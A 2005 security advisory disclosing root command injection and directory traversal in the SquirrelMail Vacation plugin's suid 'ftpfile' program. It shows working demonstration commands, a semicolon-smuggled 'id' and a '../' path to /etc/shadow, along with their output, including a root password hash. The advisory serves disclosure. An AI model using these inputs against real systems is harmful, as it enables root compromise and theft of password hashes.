Squirrelmail vacation v0.15 local root exploit
LSS Security Advisory #LSS-2005-01-03
http://security.lss.hr
---
Title : Squirrelmail vacation v0.15 local root exploit
Advisory ID : LSS-2005-01-03
Date : 10.01.2005.
Advisory URL: :
http://security.lss.hr/en/index.php?page=details&ID=LSS-2005-01-03
Impact : Privilege escalation and arbitrary file read
Risk level : High
Vulnerability type : Local
Vendors contacted : No response from vendor
---
===[ Overview
Vacation plugin for Squirrelmail allows UNIX users to set an auto-reply
message to incoming email. That is commonly used to notify the sender of
the receiver's absence. Vacation plugin specifically uses the Vacation program.
Plugin can be downloaded from:
http://www.squirrelmail.org/plugins/vacation0.15-1.43a.tar.gz
===[ Vulnerability
Within Squirrelmail Vacation plugin there is suid root program 'ftpfile'.
The program is used to access local files in user's home directory. There is
a privilege escalation and arbitrary file read vulnerability in ftpfile.
Command line arguments are passed to execve() function without checking
for meta-characters, therefore making possible execution of commands as root.
[ljuranic@laptop ljuranic]$ id
uid=509(ljuranic) gid=513(ljuranic) groups=513(ljuranic)
[ljuranic@laptop ljuranic]$ ftpfile 0 root 0 get 0 "LSS-Security;id"
/bin/cp: omitting directory `/root/0'
uid=0(root) gid=513(ljuranic) groups=513(ljuranic)
[ljuranic@laptop ljuranic]$
It is also possible to read restricted files (such as /etc/shadow), since
ftpfile can copy a file from user's home directory to any other
directory without checking file name for directory traversal attack.
$ ftpfile localhost root root get ../../../../etc/shadow ./shadow
./shadow[ljuranic@laptop ljuranic]$ head ./shadow
root:$1$Pwqt1daJ$DIe.fhBadNTN6d1br1OGy0:12401:0:99999:7:::
bin:*:10929:0:99999:7:::
daemon:*:10929:0:99999:7:::
lp:*:10929:0:99999:7:::
[ljuranic@laptop ljuranic]$
===[ Affected versions
Squirrelmail Vacation v0.15 and previous versions.
===[ Fix
Not available yet.
===[ PoC Exploit
http://security.lss.hr/exploits/
===[ Credits
Credits for this vulnerability goes to Leon Juranic.
===[ LSS Security Contact
LSS Security Team, <eXposed by LSS>
WWW : http://security.lss.hr
E-mail : security@xxxxxx
Tel : +385 1 6129 775